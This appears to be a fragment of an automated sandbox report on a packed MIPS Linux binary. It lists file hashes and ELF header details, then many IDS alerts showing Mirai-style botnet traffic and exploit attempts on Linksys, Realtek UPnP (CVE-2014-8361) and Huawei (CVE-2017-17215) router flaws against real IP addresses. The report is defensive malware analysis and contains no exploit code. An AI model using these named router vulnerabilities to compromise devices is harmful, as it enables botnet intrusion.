              		10507SPCSUSfalse
              98.137.87.74
              		unknownUnited States
              		36646YAHOO-NE1USfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
              Entropy (8bit):7.924378908952515
              TrID:
              • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
              • ELF Executable and Linkable format (generic) (4004/1) 49.84%
              File name:VC3SWrkssz
              File size:36504
              MD5:981e959599e29b1d9a2968bbf6387bae
              SHA1:258686ffea44f41925fd5af6724e69b241079013
              SHA256:dc80f285f9f5077f475dbbb184dbcfbbd32f55c2a15bb80dd04bd1ebf7468978
              SHA512:450605934931ad05cfbbabc106919ac368327a3657437a7527e33d34aa81b86f342c9e8b5fd4cc67802956c7313aeadf74b765460242bd48298c46c5f5eeb520
              SSDEEP:768:uGZhmCsNe/eOd/Zz+eCp4FYnxAs6PKaxuUd/13EJgGlzDpbuR1JY:uGmNdOdgIwyDPKa6VJui
              TLSH:AEF2F13D1B511A9FC09341BD4FA047112F520BB3DAA24D9E2588FDFA9C0A481FF636E9
              File Content Preview:.ELF......................z ...4.........4. ...(.......................d...d..............?T.C?T.C?T....................UPX!.h........7D..7D.......U.......?.E.h4...@b..) ..]....E....`f..sr...Y<M.^n..E...1....Wj..4X.._...w."..u..o..........$<..v..........[

              Static ELF Info

              ELF header

              Class:ELF32
              Data:2's complement, big endian
              Version:1 (current)
              Machine:MIPS R3000
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x107a20
              Flags:0x1007
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:2
              Section Header Offset:0
              Section Header Size:40
              Number of Section Headers:0
              Header String Table Index:0

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x1000000x1000000x8d640x8d644.17510x5R E0x10000
              LOAD0x3f540x433f540x433f540x00x00.00000x6RW 0x10000

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.23172.65.225.19835486555552027153 05/14/22-02:04:11.637927TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3548655555192.168.2.23172.65.225.198
              192.168.2.23156.245.55.12540780528692027339 05/14/22-02:05:10.063522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4078052869192.168.2.23156.245.55.125
              192.168.2.2388.221.247.4656298802027121 05/14/22-02:05:16.496663TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5629880192.168.2.2388.221.247.46
              192.168.2.23172.65.64.9842844555552027153 05/14/22-02:05:20.995117TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4284455555192.168.2.23172.65.64.98
              192.168.2.23172.65.48.2645906555552027153 05/14/22-02:05:54.037647TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4590655555192.168.2.23172.65.48.26
              192.168.2.2388.218.156.21445324802027121 05/14/22-02:05:04.368184TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4532480192.168.2.2388.218.156.214
              192.168.2.23172.65.123.7840044555552027153 05/14/22-02:04:34.703644TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4004455555192.168.2.23172.65.123.78
              192.168.2.2395.209.159.21034302802027121 05/14/22-02:04:45.560206TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3430280192.168.2.2395.209.159.210
              192.168.2.23156.226.79.2647988528692027339 05/14/22-02:04:47.625880TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4798852869192.168.2.23156.226.79.26
              192.168.2.2388.100.202.19760688802027121 05/14/22-02:04:17.306136TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6068880192.168.2.2388.100.202.197
              192.168.2.2395.94.67.1535236802027121 05/14/22-02:04:02.248726TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3523680192.168.2.2395.94.67.15
              192.168.2.2388.198.233.19751822802027121 05/14/22-02:04:21.714018TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5182280192.168.2.2388.198.233.197
              192.168.2.2388.160.72.15148858802027121 05/14/22-02:04:55.282834TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4885880192.168.2.2388.160.72.151
              192.168.2.23172.65.175.16044936555552027153 05/14/22-02:05:43.540529TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4493655555192.168.2.23172.65.175.160
              192.168.2.23172.65.246.6760502555552027153 05/14/22-02:05:45.978345TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6050255555192.168.2.23172.65.246.67
              192.168.2.23172.65.245.15651872555552027153 05/14/22-02:04:27.970733TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5187255555192.168.2.23172.65.245.156
              192.168.2.2388.221.43.15360046802027121 05/14/22-02:04:49.296960TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6004680192.168.2.2388.221.43.153
              192.168.2.23172.65.40.18455754555552027153 05/14/22-02:04:34.721447TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5575455555192.168.2.23172.65.40.184
              192.168.2.2395.170.142.9154540802027121 05/14/22-02:05:16.526766TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5454080192.168.2.2395.170.142.91
              192.168.2.23172.65.243.17456044555552027153 05/14/22-02:05:43.557862TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5604455555192.168.2.23172.65.243.174
              192.168.2.2388.83.120.5454084802027121 05/14/22-02:04:55.111233TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5408480192.168.2.2388.83.120.54
              192.168.2.23156.254.55.12150998528692027339 05/14/22-02:04:39.323189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5099852869192.168.2.23156.254.55.121
              192.168.2.23172.65.247.4456996555552027153 05/14/22-02:04:27.965299TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5699655555192.168.2.23172.65.247.44
              192.168.2.2388.12.181.23545164802027121 05/14/22-02:05:06.625031TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4516480192.168.2.2388.12.181.235
              192.168.2.23172.65.66.14948008555552027153 05/14/22-02:05:09.761803TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4800855555192.168.2.23172.65.66.149
              192.168.2.23172.65.35.5552384555552027153 05/14/22-02:05:54.037779TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5238455555192.168.2.23172.65.35.55
              192.168.2.23156.238.52.23344316528692027339 05/14/22-02:04:03.540343TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4431652869192.168.2.23156.238.52.233
              192.168.2.2395.101.124.744862802027121 05/14/22-02:04:07.843399TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4486280192.168.2.2395.101.124.7
              192.168.2.2388.151.120.23954210802027121 05/14/22-02:04:04.413192TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5421080192.168.2.2388.151.120.239
              192.168.2.23197.234.59.17640198372152835222 05/14/22-02:04:48.680620TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4019837215192.168.2.23197.234.59.176
              192.168.2.2388.221.227.22344588802027121 05/14/22-02:04:55.265828TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4458880192.168.2.2388.221.227.223
              192.168.2.23172.65.176.12349208555552027153 05/14/22-02:04:01.919544TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4920855555192.168.2.23172.65.176.123
              192.168.2.2388.116.145.17253718802027121 05/14/22-02:04:19.393127TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5371880192.168.2.2388.116.145.172
              192.168.2.2395.188.114.16159740802027121 05/14/22-02:03:57.828010TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5974080192.168.2.2395.188.114.161
              192.168.2.23172.65.210.8052764555552027153 05/14/22-02:04:07.308990TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5276455555192.168.2.23172.65.210.80
              192.168.2.2395.130.227.21954724802027121 05/14/22-02:04:09.253114TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5472480192.168.2.2395.130.227.219
              192.168.2.2395.73.184.9855062802027121 05/14/22-02:05:00.755463TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5506280192.168.2.2395.73.184.98
              192.168.2.23156.245.46.10746162528692027339 05/14/22-02:04:51.923330TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4616252869192.168.2.23156.245.46.107
              192.168.2.23156.247.21.12942964528692027339 05/14/22-02:05:32.842628TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4296452869192.168.2.23156.247.21.129
              192.168.2.2395.166.126.9450592802027121 05/14/22-02:04:25.514613TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5059280192.168.2.2395.166.126.94
              192.168.2.2395.217.139.18940702802027121 05/14/22-02:04:23.234556TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4070280192.168.2.2395.217.139.189
              192.168.2.23172.245.58.7852418555552027153 05/14/22-02:05:24.859914TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5241855555192.168.2.23172.245.58.78
              192.168.2.23172.65.244.24633926555552027153 05/14/22-02:04:52.963336TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3392655555192.168.2.23172.65.244.246
              192.168.2.23172.65.167.21250504555552027153 05/14/22-02:05:46.355886TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5050455555192.168.2.23172.65.167.212
              192.168.2.2395.34.6.15055186802027121 05/14/22-02:04:11.024463TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5518680192.168.2.2395.34.6.150
              192.168.2.2395.100.227.12641560802027121 05/14/22-02:04:19.423556TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4156080192.168.2.2395.100.227.126
              192.168.2.2388.150.188.18546066802027121 05/14/22-02:05:22.993162TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4606680192.168.2.2388.150.188.185
              192.168.2.23172.65.44.2540066555552027153 05/14/22-02:03:55.485637TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4006655555192.168.2.23172.65.44.25
              192.168.2.2395.216.50.13837606802027121 05/14/22-02:04:01.004807TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3760680192.168.2.2395.216.50.138
              192.168.2.2395.211.210.9335332802027121 05/14/22-02:04:40.769456TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3533280192.168.2.2395.211.210.93
              192.168.2.23172.65.41.9237008555552027153 05/14/22-02:04:22.454733TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3700855555192.168.2.23172.65.41.92
              192.168.2.2388.221.247.2036634802027121 05/14/22-02:04:41.120142TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3663480192.168.2.2388.221.247.20
              192.168.2.23172.65.207.22452754555552027153 05/14/22-02:04:46.156570TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5275455555192.168.2.23172.65.207.224
              192.168.2.23156.230.24.14839870528692027339 05/14/22-02:04:37.094159TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3987052869192.168.2.23156.230.24.148
              192.168.2.2388.208.209.1350344802027121 05/14/22-02:04:13.122146TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5034480192.168.2.2388.208.209.13
              192.168.2.2395.100.228.24052510802027121 05/14/22-02:04:11.012752TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5251080192.168.2.2395.100.228.240
              192.168.2.2388.221.99.5954200802027121 05/14/22-02:04:04.419952TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5420080192.168.2.2388.221.99.59
              192.168.2.23172.65.86.6346324555552027153 05/14/22-02:03:58.555530TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4632455555192.168.2.23172.65.86.63
              192.168.2.23172.65.253.16356128555552027153 05/14/22-02:04:24.881877TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5612855555192.168.2.23172.65.253.163
              192.168.2.2395.59.181.20043136802027121 05/14/22-02:05:19.833635TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4313680192.168.2.2395.59.181.200
              192.168.2.2395.100.207.12150102802027121 05/14/22-02:04:21.836564TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5010280192.168.2.2395.100.207.121
              192.168.2.23156.241.14.13254672528692027339 05/14/22-02:04:16.821957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5467252869192.168.2.23156.241.14.132
              192.168.2.2395.158.153.18444468802027121 05/14/22-02:05:16.432488TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4446880192.168.2.2395.158.153.184
              192.168.2.23172.65.241.23657156555552027153 05/14/22-02:04:39.318465TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5715655555192.168.2.23172.65.241.236
              192.168.2.23156.226.94.18941406528692027339 05/14/22-02:05:39.652328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4140652869192.168.2.23156.226.94.189
              192.168.2.2388.129.188.9241166802027121 05/14/22-02:04:19.399830TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4116680192.168.2.2388.129.188.92
              192.168.2.23172.65.166.2240758555552027153 05/14/22-02:05:46.355727TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4075855555192.168.2.23172.65.166.22
              192.168.2.2395.183.38.11852836802027121 05/14/22-02:04:50.334131TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5283680192.168.2.2395.183.38.118
              192.168.2.2388.135.148.19540620802027121 05/14/22-02:04:55.124093TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4062080192.168.2.2388.135.148.195
              192.168.2.23172.65.75.6257084555552027153 05/14/22-02:05:34.766951TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5708455555192.168.2.23172.65.75.62
              192.168.2.23172.65.204.10138326555552027153 05/14/22-02:04:43.912984TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3832655555192.168.2.23172.65.204.101
              192.168.2.2395.180.140.2447310802027121 05/14/22-02:04:36.685245TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4731080192.168.2.2395.180.140.24
              192.168.2.2388.195.2.15755260802027121 05/14/22-02:04:04.435272TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5526080192.168.2.2388.195.2.157
              192.168.2.2388.151.120.23954354802027121 05/14/22-02:04:10.940346TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5435480192.168.2.2388.151.120.239
              192.168.2.23172.65.67.9056662555552027153 05/14/22-02:04:56.047288TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5666255555192.168.2.23172.65.67.90
              192.168.2.23172.65.102.5144754555552027153 05/14/22-02:04:56.030167TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4475455555192.168.2.23172.65.102.51
              192.168.2.2395.128.74.8046640802027121 05/14/22-02:04:17.251115TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4664080192.168.2.2395.128.74.80
              192.168.2.23172.65.164.1748162555552027153 05/14/22-02:04:22.472015TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4816255555192.168.2.23172.65.164.17
              192.168.2.2388.83.121.22158894802027121 05/14/22-02:04:27.640751TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5889480192.168.2.2388.83.121.221
              192.168.2.2395.169.219.25434272802027121 05/14/22-02:04:45.846183TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3427280192.168.2.2395.169.219.254
              192.168.2.23184.105.8.3736406555552027153 05/14/22-02:05:18.793782TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3640655555192.168.2.23184.105.8.37
              192.168.2.2395.215.97.13935584802027121 05/14/22-02:04:25.532039TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3558480192.168.2.2395.215.97.139
              192.168.2.23156.224.15.17039200528692027339 05/14/22-02:04:39.797114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3920052869192.168.2.23156.224.15.170
              192.168.2.2395.213.15.3151808802027121 05/14/22-02:04:17.286891TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5180880192.168.2.2395.213.15.31
              192.168.2.2388.218.95.11037924802027121 05/14/22-02:05:28.503764TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3792480192.168.2.2388.218.95.110
              192.168.2.2395.252.227.9960514802027121 05/14/22-02:04:57.392496TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6051480192.168.2.2395.252.227.99
              192.168.2.23172.65.167.1439002555552027153 05/14/22-02:05:09.758951TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3900255555192.168.2.23172.65.167.14
              192.168.2.2388.209.80.20855570802027121 05/14/22-02:03:55.571475TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5557080192.168.2.2388.209.80.208
              192.168.2.23172.245.196.21055214555552027153 05/14/22-02:05:06.317529TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5521455555192.168.2.23172.245.196.210
              192.168.2.23156.244.77.14443746528692027339 05/14/22-02:05:07.644328TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4374652869192.168.2.23156.244.77.144
              192.168.2.2395.56.137.15542484802027121 05/14/22-02:04:07.907810TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4248480192.168.2.2395.56.137.155
              192.168.2.23156.252.26.14258998528692027339 05/14/22-02:04:30.267679TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5899852869192.168.2.23156.252.26.142
              192.168.2.23172.65.228.15633432555552027153 05/14/22-02:05:45.978228TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3343255555192.168.2.23172.65.228.156
              192.168.2.2395.211.109.3948768802027121 05/14/22-02:04:57.363312TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4876880192.168.2.2395.211.109.39
              192.168.2.2388.215.16.24440964802027121 05/14/22-02:05:36.611945TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4096480192.168.2.2388.215.16.244
              192.168.2.2388.250.175.20859942802027121 05/14/22-02:05:33.036125TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5994280192.168.2.2388.250.175.208
              192.168.2.2388.221.176.21437726802027121 05/14/22-02:05:02.940383TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3772680192.168.2.2388.221.176.214
              192.168.2.23156.254.51.13348970528692027339 05/14/22-02:05:53.246860TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4897052869192.168.2.23156.254.51.133
              192.168.2.2395.181.217.21542428802027121 05/14/22-02:04:01.013042TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4242880192.168.2.2395.181.217.215
              192.168.2.23172.65.149.22744978555552027153 05/14/22-02:03:55.468539TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4497855555192.168.2.23172.65.149.227
              192.168.2.2395.100.151.5036050802027121 05/14/22-02:05:04.113713TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3605080192.168.2.2395.100.151.50
              192.168.2.23156.226.51.2659756528692027339 05/14/22-02:03:58.608037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5975652869192.168.2.23156.226.51.26
              192.168.2.2395.44.136.16858910802027121 05/14/22-02:05:06.494711TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5891080192.168.2.2395.44.136.168
              192.168.2.23156.245.43.1833638528692027339 05/14/22-02:04:34.638673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3363852869192.168.2.23156.245.43.18
              192.168.2.23156.250.92.8149400528692027339 05/14/22-02:05:30.387325TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4940052869192.168.2.23156.250.92.81
              192.168.2.2395.101.122.12941910802027121 05/14/22-02:03:57.733650TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4191080192.168.2.2395.101.122.129
              192.168.2.2388.198.82.13638664802027121 05/14/22-02:04:36.621117TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3866480192.168.2.2388.198.82.136
              192.168.2.2388.207.159.1842422802027121 05/14/22-02:04:04.430182TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4242280192.168.2.2388.207.159.18
              192.168.2.2395.56.213.8036770802027121 05/14/22-02:04:50.593818TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3677080192.168.2.2395.56.213.80
              192.168.2.2395.159.14.9236796802027121 05/14/22-02:04:01.047400TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3679680192.168.2.2395.159.14.92
              192.168.2.2395.101.58.5948210802027121 05/14/22-02:05:00.726341TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4821080192.168.2.2395.101.58.59
              192.168.2.23172.65.45.6035894555552027153 05/14/22-02:04:31.062264TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3589455555192.168.2.23172.65.45.60
              192.168.2.2395.72.28.18446380802027121 05/14/22-02:03:57.766923TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4638080192.168.2.2395.72.28.184
              192.168.2.23172.65.174.2055300555552027153 05/14/22-02:03:58.555577TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5530055555192.168.2.23172.65.174.20
              192.168.2.23172.65.2.22159362555552027153 05/14/22-02:05:09.758996TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5936255555192.168.2.23172.65.2.221
              192.168.2.2388.151.120.23954256802027121 05/14/22-02:04:07.815463TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5425680192.168.2.2388.151.120.239
              192.168.2.2388.221.155.4942002802027121 05/14/22-02:05:52.526130TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4200280192.168.2.2388.221.155.49
              192.168.2.23184.175.126.5651794555552027153 05/14/22-02:05:04.444249TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5179455555192.168.2.23184.175.126.56
              192.168.2.23172.65.85.5640568555552027153 05/14/22-02:04:07.291997TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4056855555192.168.2.23172.65.85.56
              192.168.2.2388.221.137.23833006802027121 05/14/22-02:05:25.192641TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3300680192.168.2.2388.221.137.238
              192.168.2.2395.101.69.25058292802027121 05/14/22-02:04:01.004594TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5829280192.168.2.2395.101.69.250
              192.168.2.2395.101.188.6034116802027121 05/14/22-02:04:04.484302TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3411680192.168.2.2395.101.188.60
              192.168.2.2388.166.227.13336224802027121 05/14/22-02:04:43.350949TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3622480192.168.2.2388.166.227.133
              192.168.2.2388.147.126.18944674802027121 05/14/22-02:04:45.457773TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4467480192.168.2.2388.147.126.189
              192.168.2.23172.65.33.10843492555552027153 05/14/22-02:03:58.572506TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4349255555192.168.2.23172.65.33.108
              192.168.2.2388.201.64.538342802027121 05/14/22-02:04:52.868346TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3834280192.168.2.2388.201.64.5
              192.168.2.2388.150.171.7244640802027121 05/14/22-02:04:09.313085TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4464080192.168.2.2388.150.171.72
              192.168.2.2388.99.170.4533644802027121 05/14/22-02:04:40.769297TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3364480192.168.2.2388.99.170.45
              192.168.2.2395.101.63.8838726802027121 05/14/22-02:04:36.682429TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3872680192.168.2.2395.101.63.88
              192.168.2.23156.226.106.22449930528692027339 05/14/22-02:03:58.604415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4993052869192.168.2.23156.226.106.224
              192.168.2.2395.216.51.24245628802027121 05/14/22-02:04:17.265531TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4562880192.168.2.2395.216.51.242
              192.168.2.23172.65.200.19256740555552027153 05/14/22-02:05:46.356024TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5674055555192.168.2.23172.65.200.192
              192.168.2.2395.87.1.2257834802027121 05/14/22-02:04:34.518726TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5783480192.168.2.2395.87.1.22
              192.168.2.2388.99.138.24053168802027121 05/14/22-02:04:43.357808TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5316880192.168.2.2388.99.138.240
              192.168.2.23172.65.97.11534182555552027153 05/14/22-02:04:19.382917TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3418255555192.168.2.23172.65.97.115
              192.168.2.23172.65.167.11059028555552027153 05/14/22-02:04:34.685648TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5902855555192.168.2.23172.65.167.110
              192.168.2.2388.221.227.18053630802027121 05/14/22-02:05:50.047627TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5363080192.168.2.2388.221.227.180
              192.168.2.2388.10.175.4242760802027121 05/14/22-02:04:36.714857TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4276080192.168.2.2388.10.175.42
              192.168.2.2388.99.214.4635952802027121 05/14/22-02:04:52.770205TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3595280192.168.2.2388.99.214.46
              192.168.2.23172.65.211.6450236555552027153 05/14/22-02:05:06.237219TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5023655555192.168.2.23172.65.211.64
              192.168.2.2395.96.2.1854422802027121 05/14/22-02:05:45.528566TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5442280192.168.2.2395.96.2.18
              192.168.2.2395.216.140.24358592802027121 05/14/22-02:04:55.066889TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5859280192.168.2.2395.216.140.243
              192.168.2.2388.41.60.1836672802027121 05/14/22-02:04:40.877472TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3667280192.168.2.2388.41.60.18
              192.168.2.23156.244.102.11538702528692027339 05/14/22-02:05:52.813667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3870252869192.168.2.23156.244.102.115
              192.168.2.23172.65.95.3339672555552027153 05/14/22-02:04:04.184416TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3967255555192.168.2.23172.65.95.33
              192.168.2.2395.180.146.9351564802027121 05/14/22-02:04:34.515139TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5156480192.168.2.2395.180.146.93
              192.168.2.23172.65.124.3056878555552027153 05/14/22-02:04:39.300441TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5687855555192.168.2.23172.65.124.30
              192.168.2.2395.52.241.2750394802027121 05/14/22-02:04:01.045396TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5039480192.168.2.2395.52.241.27
